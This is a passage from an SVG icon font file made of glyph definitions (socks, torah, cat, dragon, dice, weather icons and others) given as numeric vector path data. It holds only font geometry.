c0 79.6406 -64.46 143.98 -144 143.98c-79.6494 0 -144 -64.4502 -144 -143.98c0 -79.6396 64.4609 -143.979 144 -143.979zM208.04 336c40.7803 0 73.8398 -33.0498 73.8398 -73.8301c0 -32.9697 -48.2598 -93.0498 -66.75 -114.86
c-1.5293 -1.8291 -4.70508 -3.31445 -7.08984 -3.31445s-5.56055 1.48535 -7.08984 3.31445c-18.4902 21.8105 -66.75 81.9004 -66.75 114.86c0 40.7803 33.0596 73.8301 73.8398 73.8301zM208.04 240c13.25 0 24 10.75 24 24c0 13.2598 -10.75 24 -24 24
s-24 -10.7402 -24 -24c0 -13.25 10.7402 -24 24 -24z" />
    <glyph glyph-name="socks" unicode="&#xf696;" 
d="M214.66 136.99c-52.7402 -39.5605 -69.0498 -110.021 -39.2002 -165.4l-21.8604 -16.3896c-17.2695 -12.9502 -37.4893 -19.2002 -57.5195 -19.2002c-32.8105 0 -65.6904 16.75 -83.9404 48.3301c-24.6494 42.6396 -10.1895 97.5 29.21 127.06l86.6504 64.6104v176h160
v-160zM288 416v-32h-160v32c0 17.6699 14.3301 32 32 32h128c2.84961 0 5.40039 -0.919922 8.01953 -1.62012c-4.94922 -9.08008 -8.01953 -19.3301 -8.01953 -30.3799zM480 448c17.6699 0 32 -14.3301 32 -32v-32h-192v32c0 17.6699 14.3301 32 32 32h128zM320 176v176h192
v-208v-0.00195312c0 -35.3271 -22.9375 -81.2021 -51.2002 -102.398l-115.2 -86.3994c-17.2695 -12.9502 -37.4893 -19.2002 -57.5195 -19.2002c-32.8105 0 -65.1699 16.75 -83.4199 48.3301c-24.6504 42.6396 -10.1904 97.5 29.21 127.06z" />
    <glyph glyph-name="square-root-alt" unicode="&#xf698;" horiz-adv-x="576" 
d="M571.31 196.69c6.25 -6.25 6.25 -16.3809 0 -22.6309l-46.0596 -46.0596l46.0596 -46.0596c6.25 -6.25 6.25 -16.3809 0 -22.6309l-22.6191 -22.6191c-6.25 -6.25 -16.3809 -6.25 -22.6309 0l-46.0596 46.0596l-46.0596 -46.0596c-6.25 -6.25 -16.3809 -6.25 -22.6309 0
l-22.6191 22.6191c-6.25 6.25 -6.25 16.3809 0 22.6309l46.0596 46.0596l-46.0596 46.0596c-6.25 6.25 -6.25 16.3809 0 22.6309l22.6191 22.6191c6.25 6.25 16.3809 6.25 22.6309 0l46.0596 -46.0596l46.0596 46.0596c6.25 6.25 16.3809 6.25 22.6309 0zM552 448
c13.25 0 24 -10.7402 24 -24v-48c0 -13.25 -10.75 -24 -24 -24h-194.97l-97.8105 -374.52c-9.83984 -32.4805 -37.0098 -41.4805 -54.2793 -41.4805c-18.6406 0 -35.9502 8.5 -48.4404 28.2695l-88.8799 163.73h-43.6201c-13.25 0 -24 10.75 -24 24v48
c0 13.2598 10.75 24 24 24h81.4697c10.4385 -0.00292969 22.9961 -7.42578 28.0303 -16.5703l58.4102 -106.1l84.79 322.8c3.68945 14.0703 16.4102 23.8701 30.9502 23.8701h244.35z" />
    <glyph glyph-name="star-and-crescent" unicode="&#xf699;" horiz-adv-x="511" 
d="M340.47 -18.3604c8.74023 0 15.1299 -6.96973 15.1299 -15.0596c0 -6.62012 -4.31934 -12.2402 -10.2793 -14.2598c-29.04 -10.8301 -59.0898 -16.3203 -89.3203 -16.3203c-141.16 0 -256 114.84 -256 256s114.84 256 256 256c30.3896 0 60.5801 -5.54004 89.75 -16.4805
c6.91992 -2.59961 10.9297 -9.83984 9.46973 -17.0898c-1.41992 -7.04004 -7.62012 -12.0693 -14.75 -12.0693c-1.47949 0 -6.85938 0.459961 -9.17969 0.459961c-116.25 0 -210.82 -94.5703 -210.82 -210.82s94.5703 -210.82 210.82 -210.82
c2.29004 0 7.72949 0.459961 9.17969 0.459961zM503.46 234.14c8.16992 -1.17969 11.4297 -11.2197 5.52051 -16.9893l-55.2705 -53.8701l13.0498 -76.0703c1.11035 -6.42969 -4.00977 -11.6602 -9.80957 -11.6602c-1.53027 0 -3.11035 0.370117 -4.64062 1.16992
l-68.3096 35.9102l-68.3301 -35.9102c-1.53027 -0.80957 -3.11035 -1.16992 -4.63965 -1.16992c-5.7998 0 -10.9199 5.21973 -9.81055 11.6602l13.0498 76.0703l-55.2695 53.8701c-5.91016 5.76953 -2.65039 15.8096 5.51953 16.9893l76.3809 11.1006l34.1592 69.21
c1.83008 3.7002 5.38086 5.5498 8.93066 5.5498s7.09961 -1.84961 8.92969 -5.5498l34.1602 -69.21z" />
    <glyph glyph-name="star-of-david" unicode="&#xf69a;" horiz-adv-x="464" 
d="M405.68 192l53.2207 -89.3896c14.4092 -24.21 -3.41016 -54.6104 -32.0107 -54.6104h-106.93l-55.9502 -93.9805c-7.14941 -12.0098 -19.5801 -18.0195 -32.0098 -18.0195s-24.8604 6.00977 -32.0098 18.0195l-55.9502 93.9805h-106.93
c-28.6006 0 -46.4199 30.4004 -32.0107 54.6104l53.2207 89.3896l-53.2207 89.3896c-14.4092 24.21 3.41016 54.6104 32.0107 54.6104h106.93l55.9502 93.9805c7.14941 12.0098 19.5801 18.0195 32.0098 18.0195s24.8604 -6.00977 32.0098 -18.0195l55.9502 -93.9805h106.92
c28.6006 0 46.4199 -30.4004 32.0098 -54.6104zM392.9 280h-39.6006l19.7998 -33.2598zM340.51 192l-52.3896 88h-112.25l-52.3799 -88l52.3896 -88h112.24zM232 374.28l-22.7803 -38.2803h45.5703zM71.0996 280l19.8008 -33.2598l19.7998 33.2598h-39.6006zM71.0996 104
h39.6006l-19.7998 33.2598zM232 9.71973l22.7803 38.2803h-45.5703zM353.29 104h39.6104l-19.8105 33.2598z" />
    <glyph glyph-name="synagogue" unicode="&#xf69b;" horiz-adv-x="640" 
d="M70 251.49c5.30957 6.00977 14.6904 6.00977 20 0l38 -43.0703v-272.42h-128v226.07v0.00683594c0 5.5625 2.98828 13.4629 6.66992 17.6328zM633.33 179.71c4.2998 -4.87012 6.66992 -11.1396 6.66992 -17.6396v-226.07h-128v272.42l38 43.0703
c5.30957 6.01953 14.6904 6.01953 20 0zM339.99 440.99l128 -102.4c7.58984 -6.07031 12.0098 -15.2695 12.0098 -24.9902v-377.6h-96v96c0 38.8701 -34.6602 69.6504 -74.75 63.1201c-31.4697 -5.12012 -53.25 -34.6699 -53.25 -66.5498v-92.5703h-96v377.6
c0 8.49023 5.38086 19.6865 12.0098 24.9902l128 102.4c11.6904 9.34961 28.29 9.34961 39.9805 0zM392.06 225.44l-19.1895 30.5596l19.2002 30.5703c1.97949 3.14941 -0.290039 7.23926 -4 7.23926h-38.9502l-25.1201 39.9805c-1.84961 2.9502 -6.15039 2.9502 -8 0
l-25.1201 -40h-38.9395c-3.70996 0 -5.98047 -4.08984 -4 -7.24023l19.1992 -30.5596l-19.1992 -30.5605c-1.98047 -3.14941 0.279297 -7.23926 4 -7.23926h38.9395l25.1201 -39.9805c1.84961 -2.9502 6.15039 -2.9502 8 0l25.1201 39.9902h38.9395
c3.70996 0 5.98047 4.08984 4 7.24023z" />
    <glyph glyph-name="torah" unicode="&#xf6a0;" horiz-adv-x="640" 
d="M48 448c26.4688 -0.0273438 47.9727 -21.5312 48 -48v-80h-80c-8.83203 0 -16 7.16797 -16 16v64c0.0273438 26.4688 21.5312 47.9727 48 48zM395.14 219.44l17.4404 29.1699l17.4697 -29.1699h-34.9102zM336.05 167.37l-16.7998 28.0703h33.5801zM242 219.44
l17.4199 29.1895l17.4805 -29.1895h-34.9004zM430 324.56l-17.4199 -29.1895l-17.4805 29.1895h34.9004zM256 35.4297c0 -31.8896 -21.7803 -61.4297 -53.25 -66.5498c-2.94531 -0.501953 -7.76172 -0.90918 -10.75 -0.90918c-35.3281 0 -64 28.6719 -64 64v0.0292969v368
c-0.0527344 14.7783 -7.40527 36.2822 -16.4102 48h336.41c52.9365 -0.0546875 95.9453 -43.0635 96 -96v-256h-288v-60.5703zM217.41 338.43c-1.44824 -2.50977 -2.62402 -6.91797 -2.62402 -9.81543c0 -3.03125 1.27832 -7.59375 2.85352 -10.1846l27.79 -46.4297
l-27.6602 -46.2695c-1.57324 -2.62305 -2.84961 -7.23242 -2.84961 -10.29c0 -11.0352 8.95508 -19.9951 19.9902 -20h56.3896l27.7002 -46.2803c3.14844 -5.34375 10.7363 -9.68066 16.9385 -9.68066c0.0175781 0 0.0449219 0 0.0615234 0.000976562
c6.29199 0.00390625 13.9971 4.40332 17.2002 9.81934l27.5898 46.1201h56.2998h0.0302734c6.44922 0 14.2754 4.54688 17.4697 10.1504c1.45117 2.51172 2.62988 6.9043 2.62988 9.80566c0 3.03516 -1.28125 7.60156 -2.85938 10.1943l-27.79 46.4297l27.6797 46.2695
c1.57324 2.62305 2.85059 7.23242 2.85059 10.29c0 11.0352 -8.95605 19.9951 -19.9902 20h-56.3604l-27.7002 46.2803c-3.14844 5.34375 -10.7363 9.68066 -16.9385 9.68066c-0.0166016 0 -0.0439453 0 -0.0615234 -0.000976562
c-0.00976562 0 -0.0244141 0.000976562 -0.0341797 0.000976562c-6.29785 0 -14.0098 -4.39941 -17.2158 -9.82031l-27.5898 -46.1201h-56.2998h-0.0302734c-6.44922 0 -14.2754 -4.54688 -17.4697 -10.1504zM624 64c8.83203 0 16 -7.16797 16 -16
c0 -61.8242 -50.1758 -112 -112 -112h-336c52.9316 0.0605469 95.9395 43.0684 96 96v32h336zM276.86 324.56l-17.3906 -29.1699l-17.4697 29.1699h34.8604zM336 376.62l16.75 -28.0605h-33.5801zM304.88 219.44l-31.4697 52.5596l31.4102 52.5801h62.2998l31.4697 -52.5801
l-31.4102 -52.5596h-62.2998z" />
    <glyph glyph-name="torii-gate" unicode="&#xf6a1;" 
d="M376.45 416c39.4961 0.00195312 100.223 14.3389 135.55 32v-96c0 -17.6699 -14.3301 -32 -32 -32h-32v-64h48c8.83984 0 16 -7.16016 16 -16v-32c0 -8.83984 -7.16016 -16 -16 -16h-48v-240c0 -8.83984 -7.16016 -16 -16 -16h-32c-8.83984 0 -16 7.16016 -16 16v240
h-256v-240c0 -8.83984 -7.16016 -16 -16 -16h-32c-8.83984 0 -16 7.16016 -16 16v240h-48c-8.83984 0 -16 7.16016 -16 16v32c0 8.83984 7.16016 16 16 16h48v64h-32c-17.6699 0 -32 14.3301 -32 32v96c35.3271 -17.6611 96.0537 -31.998 135.55 -32h240.9zM128 320v-64h96
v64h-96zM384 256v64h-96v-64h96z" />
    <glyph glyph-name="vihara" unicode="&#xf6a7;" horiz-adv-x="639" 
d="M632.88 47.29c5.41992 -3.61035 7.7002 -9.62012 6.99023 -15.29c-0.620117 -5.00977 -3.56055 -9.75 -8.71973 -12.3301l-55.1504 -19.6699v-48c0 -8.83984 -7.16016 -16 -16 -16h-32c-8.83984 0 -16 7.16016 -16 16v48h-160v-48c0 -8.83984 -7.16016 -16 -16 -16h-32
c-8.83984 0 -16 7.16016 -16 16v48h-160v-48c0 -8.83984 -7.16016 -16 -16 -16h-32c-8.83984 0 -16 7.16016 -16 16v48l-55.1602 19.6699c-5.14941 2.58008 -8.09961 7.32031 -8.71973 12.3301c-0.700195 5.66016 1.58008 11.6699 7 15.29l88.8799 48.71v64
l-55.1602 17.6904c-11.79 5.89941 -11.79 22.7197 0 28.6191l119.16 49.6904v64l-27.3096 16.3096c-7.7207 7.7207 -5.61035 20.7402 4.15918 25.6201l183.15 86.0703l183.15 -86.0801c9.76953 -4.87988 11.8799 -17.9004 4.15918 -25.6201l-27.3096 -16.2998v-64
l119.16 -49.6904c11.79 -5.89941 11.79 -22.7197 0 -28.6191l-55.1602 -17.6904v-64zM224 320v-64h192v64h-192zM160 96h320v64h-320v-64z" />
    <glyph glyph-name="volume-mute" unicode="&#xf6a9;" 
d="M215.03 376.95c15.0098 15.0098 40.9697 4.49023 40.9697 -16.9697v-335.961c0 -21.4395 -25.9404 -32 -40.9697 -16.9697l-88.9707 88.9502h-102.06c-13.2598 0 -24 10.75 -24 24v144c0 13.2598 10.7402 24 24 24h102.06zM461.64 192l45.6406 -45.6396
c6.2998 -6.30078 6.2998 -16.5205 0 -22.8203l-22.8203 -22.8203c-6.2998 -6.2998 -16.5195 -6.2998 -22.8203 0l-45.6396 45.6406l-45.6299 -45.6299c-6.2998 -6.30078 -16.5205 -6.30078 -22.8203 0l-22.8193 22.8193c-6.30078 6.2998 -6.30078 16.5205 0 22.8203
l45.6299 45.6299l-45.6406 45.6396c-6.2998 6.30078 -6.2998 16.5205 0 22.8203l22.8203 22.8203c6.2998 6.2998 16.5195 6.2998 22.8203 0l45.6396 -45.6406l45.6396 45.6406c6.30078 6.2998 16.5205 6.2998 22.8203 0l22.8203 -22.8203
c6.2998 -6.2998 6.2998 -16.5195 0 -22.8203z" />
    <glyph glyph-name="yin-yang" unicode="&#xf6ad;" horiz-adv-x="496" 
d="M248 440c136.97 0 248 -111.03 248 -248s-111.03 -248 -248 -248s-248 111.03 -248 248s111.03 248 248 248zM248 64c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32zM248 192c53.0195 0 96 42.9805 96 96s-42.9805 96 -96 96
c-106.04 0 -192 -85.96 -192 -192s85.96 -192 192 -192c-53.0195 0 -96 42.9805 -96 96s42.9805 96 96 96zM248 320c17.6699 0 32 -14.3301 32 -32s-14.3301 -32 -32 -32s-32 14.3301 -32 32s14.3301 32 32 32z" />
    <glyph glyph-name="blender-phone" unicode="&#xf6b6;" horiz-adv-x="576" 
d="M392 384c-4.41992 0 -8 -3.58008 -8 -8v-16c0 -4.41992 3.58008 -8 8 -8h157.82l-17.46 -64h-140.36c-4.41992 0 -8 -3.58008 -8 -8v-16c0 -4.41992 3.58008 -8 8 -8h131.64l-17.46 -64h-114.18c-4.41992 0 -8 -3.58008 -8 -8v-16c0 -4.41992 3.58008 -8 8 -8h105.46
l-17.46 -64h-288v352h384l-17.46 -64h-166.54zM158.8 112.99c3.00977 -7.40039 0.200195 -15.8506 -6.68945 -20.0703l-39.4102 -24.1797c-12.5303 -7.68066 -31.7803 -6 -41.6504 4.7998c-94.0996 102.94 -94.6699 258.89 -2.09961 362.49
c11.1396 12.4697 29.5596 15.8398 43.8896 7.0498l39.2803 -24.0996c6.87988 -4.2207 9.7002 -12.6807 6.67969 -20.0703l-25.7803 -63.2598c-2.7793 -6.80078 -9.80957 -10.9902 -17.2393 -10.2607l-45.0303 4.41992c-17.6504 -47.9395 -17.2803 -100.779 0 -147.72
l45.0303 4.41992c7.43945 0.730469 14.46 -3.4502 17.2393 -10.2598zM480 64c35.3496 0 64 -28.6504 64 -64v-32c0 -17.6699 -14.3301 -32 -32 -32h-352c-17.6699 0 -32 14.3301 -32 32v32c0 35.3496 28.6504 64 64 64h288zM336 -32c17.6699 0 32 14.3301 32 32
s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32z" />
    <glyph glyph-name="book-dead" unicode="&#xf6b7;" horiz-adv-x="448" 
d="M272 312c-8.7998 0 -16 7.2002 -16 16s7.2002 16 16 16s16 -7.2002 16 -16s-7.2002 -16 -16 -16zM448 89.5996c0 -9.59961 -3.2002 -16 -9.59961 -19.1992c-3.2002 -12.8008 -3.2002 -57.6006 0 -73.6006c6.39941 -6.39941 9.59961 -12.7998 9.59961 -19.2002v-16
c0 -16 -12.7998 -25.5996 -25.5996 -25.5996h-326.4c-54.4004 0 -96 41.5996 -96 96v320c0 54.4004 41.5996 96 96 96h326.4c16 0 25.5996 -9.59961 25.5996 -25.5996v-332.801zM240 392c-44.2002 0 -80 -28.7002 -80 -64c0 -20.9004 12.7002 -39.2002 32 -50.9004v-13.0996
c0 -8.7998 7.2002 -16 16 -16h64c8.7998 0 16 7.2002 16 16v13.0996c19.2998 11.7002 32 30 32 50.9004c0 35.2998 -35.7998 64 -80 64zM124.8 224.7c-1.7002 -4.10059 0.100586 -8.7998 4.2002 -10.5l70.5 -30.2998l-70.4004 -30.1006
c-4.09961 -1.7002 -5.89941 -6.39941 -4.19922 -10.5l6.2998 -14.7002c1.7002 -4.09961 6.39941 -5.89941 10.5 -4.19922l98.2998 42.1992l98.2998 -42.0996c4.10059 -1.7002 8.7998 0.0996094 10.5 4.2002l6.2998 14.7002c1.7002 4.09961 -0.0996094 8.7998 -4.19922 10.5
l-70.3008 30.0996l70.3008 30.2002c4.09961 1.7002 5.89941 6.39941 4.19922 10.5l-6.2998 14.7002c-1.7002 4.09961 -6.39941 5.89941 -10.5 4.19922l-98.3994 -42.0996l-98.3008 42.0996c-4.09961 1.7002 -8.7998 -0.0996094 -10.5 -4.19922zM380.8 0v64h-284.8
c-16 0 -32 -12.7998 -32 -32s12.7998 -32 32 -32h284.8zM208 312c-8.7998 0 -16 7.2002 -16 16s7.2002 16 16 16s16 -7.2002 16 -16s-7.2002 -16 -16 -16z" />
    <glyph glyph-name="campground" unicode="&#xf6bb;" horiz-adv-x="640" 
d="M624 0c8.83984 0 16 -7.16016 16 -16v-32c0 -8.83984 -7.16016 -16 -16 -16h-608c-8.83984 0 -16 7.16016 -16 16v32c0 8.83984 7.16016 16 16 16h24.6797l239.79 330.25l-53.4102 73.5498c-5.19922 7.15039 -3.60938 17.1602 3.54004 22.3506l25.8809 18.7998
c7.14941 5.18945 17.1592 3.59961 22.3496 -3.5498l41.1699 -56.7002l41.1602 56.6895c5.2002 7.16016 15.2002 8.74023 22.3496 3.55078l25.9004 -18.79c7.14941 -5.19043 8.72949 -15.2002 3.54004 -22.3506l-53.4102 -73.5498l239.78 -330.25h24.6797zM320 160
l-116.36 -160h232.721z" />
    <glyph glyph-name="cat" unicode="&#xf6be;" 
d="M290.59 256c11.8906 -58.3496 63.6006 -102.4 125.41 -102.4c11.1104 0 21.71 1.87012 32 4.54004v-206.14c0 -8.83984 -7.16016 -16 -16 -16h-32c-8.83984 0 -16 7.16016 -16 16v144l-128 -96h32c17.6699 0 32 -14.3301 32 -32v-16c0 -8.83984 -7.16016 -16 -16 -16
h-176c-35.2998 0 -64 28.7002 -64 64v256c0 17.6396 -14.3604 32 -32 32c-17.6699 0 -32 14.3301 -32 32s14.3301 32 32 32c52.9404 0 96 -43.0596 96 -96v-85.9502c55.7695 83.9697 142.41 85.9502 162.59 85.9502zM448 352l64 64v-134.4c0 -53.0195 -42.9805 -96 -96 -96
s-96 42.9805 -96 96v134.4l64 -64h64zM376 272c8.83984 0 16 7.16016 16 16s-7.16016 16 -16 16s-16 -7.16016 -16 -16s7.16016 -16 16 -16zM456 272c8.83984 0 16 7.16016 16 16s-7.16016 16 -16 16s-16 -7.16016 -16 -16s7.16016 -16 16 -16z" />
    <glyph glyph-name="chair" unicode="&#xf6c0;" horiz-adv-x="447" 
d="M112 320v-128h-48v128c0 70.7002 57.2998 128 128 128h64c70.7002 0 128 -57.2998 128 -128v-128h-48v128c0 29.5 -16.2002 55 -40 68.9004v-196.9h-48v208h-48v-208h-48v196.9c-23.7998 -13.9004 -40 -39.4004 -40 -68.9004zM446.3 106.1
c6.90039 -20.6992 -8.5 -42.0996 -30.2998 -42.0996v-112c0 -8.7998 -7.2002 -16 -16 -16h-32c-8.7998 0 -16 7.2002 -16 16v112h-256v-112c0 -8.7998 -7.2002 -16 -16 -16h-32c-8.7998 0 -16 7.2002 -16 16v112c-21.7998 0 -37.2002 21.4004 -30.4004 42.0996l10.7002 32
c4.40039 13.1006 16.6006 21.9004 30.4004 21.9004h362.5c13.7998 0 26 -8.7998 30.3994 -21.9004z" />
    <glyph glyph-name="cloud-moon" unicode="&#xf6c3;" horiz-adv-x="576" 
d="M342.8 95.2998c40.9004 -3.5 73.2002 -37.3994 73.2002 -79.2998c0 -44.2002 -35.7998 -80 -80 -80h-240c-53 0 -96 43 -96 96c0 41.9004 27.0996 77.2002 64.5996 90.2998c-0.0996094 1.90039 -0.599609 3.7002 -0.599609 5.7002c0 53 43 96 96 96
c36.2002 0 67.4004 -20.2998 83.7002 -49.9004c11.5 11 27.0996 17.9004 44.2998 17.9004c35.2998 0 64 -28.7002 64 -64c0 -12 -3.5 -23.0996 -9.2002 -32.7002zM565.3 149.6c8.2002 1.60059 14 -8 8.7002 -14.5c-33.4004 -41.0996 -82.7002 -67 -137.1 -70.3994
c-11.1006 23.0996 -29.9004 41.7998 -53.5 52.5996c0.399414 3.5 0.599609 7.10059 0.599609 10.7002c0 52.9004 -43.0996 96 -96 96c-12.7002 0 -25 -2.5 -36.4004 -7.2002c-5.09961 5.2998 -10.7998 9.90039 -16.6992 14.2002c-1.10059 8.2002 -1.80078 16.5 -1.80078 25
c0 106.1 86 192 191.9 192c11.7002 0 23.4004 -1.09961 35.0996 -3.2002c8.2002 -1.59961 10.1006 -12.5996 2.80078 -16.7002c-47.1006 -26.7998 -76.1006 -76.5996 -76.1006 -130.8c0 -94 85.4004 -165.399 178.5 -147.7z" />
    <glyph glyph-name="cloud-sun" unicode="&#xf6c4;" horiz-adv-x="640" 
d="M575.2 122.3c37.5996 -13 64.7998 -48.2998 64.7998 -90.3994c0 -53 -43 -96 -96 -96h-272c-53 0 -96 43 -96 96c0 50.5996 39.2998 91.5996 88.9004 95.2998c-0.200195 2.89941 -0.900391 5.7002 -0.900391 8.7002c0 61.8994 50.2002 112 112 112
c45.4004 0 84.2998 -27.2002 101.9 -66c9.89941 6.19922 21.5 10 34.0996 10c35.2998 0 64 -28.7002 64 -64c0 -1.90039 -0.599609 -3.7002 -0.799805 -5.60059zM144.8 144.9c10.6006 -10.6006 22.9004 -18.6006 36 -24c-9.59961 -9.80078 -17.5 -21.1006 -23.5996 -33.5
l-76.1006 -25.3008c-11.8994 -3.89941 -23.1992 7.30078 -19.1992 19.2002l29.2998 87.7998l-82.7998 41.4004c-11.2002 5.59961 -11.2002 21.5 0 27.0996l82.7998 41.5l-29.2998 87.8008c-3.90039 11.7998 7.39941 23.0996 19.1992 19.1992l87.9004 -29.2998
l41.4004 82.7998c5.59961 11.2002 21.5996 11.2002 27.0996 0l41.5 -82.7998l87.7998 29.2998c11.9004 3.90039 23.2002 -7.2998 19.2002 -19.1992l-29.7998 -88.9004c-10.6006 -1.5 -20.9004 -3.7998 -30.7002 -7.5c-5.40039 11.7998 -12.5996 23 -22.2998 32.7002
c-43.7002 43.7002 -114.7 43.7002 -158.4 0c-43.7002 -43.6006 -43.7002 -114.601 0 -158.3zM140 224.1c0 46.3008 37.7002 83.9004 84 83.9004c34 0 63.2998 -20.4004 76.5 -49.5c-36.4004 -22.5 -62 -60.7002 -67.4004 -105
c-8.89941 -2.90039 -17.1992 -7 -25.1992 -11.7002c-38.6006 7.5 -67.9004 41.5 -67.9004 82.2998z" />
    <glyph glyph-name="dice-d20" unicode="&#xf6cf;" horiz-adv-x="480" 
d="M106.75 232.94l108.64 -190.101l-208.26 22.0703c-5.83008 0.639648 -9.00977 7.13965 -5.92969 12.1396zM7.41016 132.57c-2.12012 -3.44043 -7.41016 -1.94043 -7.41016 2.08984v162.81c0 3.11035 3.38965 5.03027 6.05957 3.43066l76.6406 -45.9805zM18.25 24.4004
c-4.03027 1.97949 -2.25 8.06934 2.2002 7.56934l203.55 -22.2998v-65.6699c0 -5.83008 -6.0498 -9.70996 -11.3496 -7.25977zM99.4697 282.18l-81.5293 48.6904c-2.52051 1.51953 -2.60059 5.16016 -0.130859 6.78027l150.811 98.6094
c7.18945 4.11035 15.1201 -4.08008 10.7803 -11.1396zM240 272h-109.21l95.5801 168.38c3.12988 5.08008 8.37988 7.62012 13.6299 7.62012s10.5 -2.54004 13.6299 -7.62012l95.5801 -168.38h-109.21zM473.94 300.9c2.66992 1.59961 6.05957 -0.320312 6.05957 -3.43066
v-162.81c0 -4.04004 -5.2998 -5.54004 -7.41016 -2.10059l-75.29 122.351zM380.53 282.18l-79.9307 142.94c-4.33984 7.05957 3.59082 15.25 10.7803 11.1396l150.811 -98.5996c2.46973 -1.62012 2.39941 -5.25977 -0.130859 -6.78027zM459.55 31.9697
c4.4502 0.5 6.23047 -5.58984 2.2002 -7.55957l-194.4 -87.6602c-5.2998 -2.4502 -11.3496 1.41992 -11.3496 7.25977v65.6699zM373.25 232.94l105.56 -155.891c3.08008 -5 -0.0996094 -11.4902 -5.92969 -12.1396l-208.26 -22.0703zM240 240h100.43l-100.43 -175.75
l-100.43 175.75h100.43z" />
    <glyph glyph-name="dice-d6" unicode="&#xf6d1;" horiz-adv-x="448" 
d="M422.19 338.05c5.3291 -3.24023 5.2998 -11.2695 -0.0507812 -14.46l-198.14 -118.14l-198.13 118.14c-5.35059 3.19043 -5.37988 11.2305 -0.0605469 14.46l165.971 100.88c19.9102 12.1006 44.5195 12.1006 64.4297 0zM436.03 293.42
c5.33008 3.17969 11.9697 -0.839844 11.9697 -7.25v-197.7c0 -23.7598 -12.1104 -45.7393 -31.79 -57.7002l-152.16 -92.4795c-10.6602 -6.48047 -24.0498 1.5498 -24.0498 14.4297v223.82zM0 286.17c0 6.41016 6.63965 10.4297 11.9697 7.25l196.03 -116.88v-223.81
c0 -12.8906 -13.3799 -20.9102 -24.0498 -14.4307l-152.16 92.4697c-19.6797 11.9609 -31.79 33.9307 -31.79 57.7002v197.7z" />
    <glyph glyph-name="dog" unicode="&#xf6d3;" 
d="M496 352c8.83984 0 16 -7.16016 16 -16v-32c0 -35.3496 -28.6504 -64 -64 -64h-32v-35.5801l-128 45.71v149.84c0 14.25 17.2305 21.3906 27.3203 11.3105l27.2793 -27.2803h53.6201c10.917 -0.000976562 23.7383 -7.92578 28.6201 -17.6904l7.16016 -14.3096h64z
M384 304c8.83984 0 16 7.16016 16 16s-7.16016 16 -16 16s-16 -7.16016 -16 -16s7.16016 -16 16 -16zM96 224h170.05l149.95 -53.5498v-218.45c0 -8.83984 -7.16016 -16 -16 -16h-64c-8.83984 0 -16 7.16016 -16 16v112h-160v-112c0 -8.83984 -7.16016 -16 -16 -16h-64
c-8.83984 0 -16 7.16016 -16 16v213.9c-37.1699 13.25 -64 48.4395 -64 90.0996c0 17.6699 14.3301 32 32 32s32 -14.3301 32 -32c0 -17.6396 14.3604 -32 32 -32z" />
    <glyph glyph-name="dragon" unicode="&#xf6d5;" horiz-adv-x="640" 
d="M18.3203 192.22c-15.96 -2.2793 -24.8906 17.8105 -12.5107 28.1406l117.4 116.34c21.7705 18.5996 53.2402 20.4697 77.0596 4.58984l119.73 -87.5996v-42.2705c0 -28.9102 5.29004 -56.9795 14.7305 -83.3799h-222.7c-14.25 0 -21.3906 17.2295 -11.3105 27.3096
l91.2803 68.6904zM575.19 158.12c41.9092 -20.96 67.1592 -64.0801 64.6396 -111.36c-3.37988 -63.2002 -59.7002 -110.77 -122.99 -110.76h-499.08c-9.80957 0 -17.7598 8 -17.7598 17.7998c0 8.32031 5.78027 15.5303 13.9004 17.3301
c89.54 19.9004 238.51 54.1006 434.1 60.9102c-59.9697 39.9902 -96 107.3 -96 179.38v108.62l-59.5801 24.8496c-5.90039 2.9502 -5.90039 11.3604 0 14.3105l59.5801 24.8398l-61.6396 50.3496c-5.04004 5.04004 -1.4707 13.6104 5.65918 13.6104h237.45
c10.0703 0 19.5498 -4.7002 25.6006 -12.7598l74.5293 -99.3799c3.53223 -4.71094 6.39844 -13.3115 6.39844 -19.1992c0 -4.16992 -1.51367 -10.5811 -3.37793 -14.3115l-14.3105 -28.6191c-4.88086 -9.76465 -17.7031 -17.6895 -28.6191 -17.6904h-30.9707
c-8.48926 0 -16.6299 3.37012 -22.6299 9.37012l-28.0898 22.6299h-64v-36.6904c0.00195312 -16.3701 11.8877 -35.5986 26.5303 -42.9199zM489.18 381.75c-4.33008 -17.1396 8.56055 -28.96 21.5205 -29.6699c11.6602 -0.629883 21.3799 7.34961 24.1299 18.2598z" />
    <glyph glyph-name="drumstick-bite" unicode="&#xf6d7;" 
d="M462.8 398.43c34.3203 -34.2793 50.4307 -79.5996 49.1299 -124.56c-41.9795 22.6602 -94.3594 17.5596 -128.739 -16.7998c-40.8809 -40.8398 -40.6904 -107.181 -1.05078 -151.07c-16.2383 -5.52246 -43.3389 -10.0049 -60.4912 -10.0049
c-0.385742 0 -1.0127 0.00195312 -1.39844 0.00488281h-85.8896l-40.6104 -40.5596c-9.71973 -9.75 -11.0898 -24.0205 -6 -36.75c2.38477 -5.95898 4.32031 -16.0049 4.32031 -22.4229c0 -33.3135 -27.0371 -60.3496 -60.3506 -60.3496
c-13.8428 0 -33.0039 7.96191 -42.7695 17.7725c-15.2803 15.2695 -19.6006 36.5 -15.1006 56.0996c-19.6094 -4.49023 -40.8496 -0.179688 -56.1191 15.0703c-9.77148 9.75684 -17.7021 28.8828 -17.7021 42.6914c0 33.3018 27.0273 60.3301 60.3301 60.3301
c6.40234 0 16.4248 -1.92773 22.3721 -4.30176c12.7793 -5.07031 27.0791 -3.69043 36.7793 6l40.6201 40.5898v85.8301c0 64 27.6904 107 63.1699 142.43c27.3887 27.3604 81.0371 49.5664 119.75 49.5664c38.7139 0 92.3613 -22.2061 119.75 -49.5664z" />
    <glyph glyph-name="dungeon" unicode="&#xf6d9;" 
d="M128.73 252.68c6.58984 -4.12012 8.89941 -12.2393 6.33984 -19.5801c-3 -8.60938 -5.15039 -17.6094 -6.24023 -26.9395c-0.929688 -7.91016 -7.0498 -14.1602 -15.0098 -14.1602h-97.1299c-9.10059 0 -16.7402 7.62988 -16.1504 16.7197
c1.66016 25.7793 11.7178 65.7725 22.4502 89.2705c3.93945 8.62012 14.8896 11.4697 22.9297 6.4502zM319.03 440c9.16992 -2.36035 13.9102 -12.5996 10.3896 -21.3896l-37.4697 -104.03c-2.28027 -6.34961 -8.2998 -10.5801 -15.0498 -10.5801h-41.8008
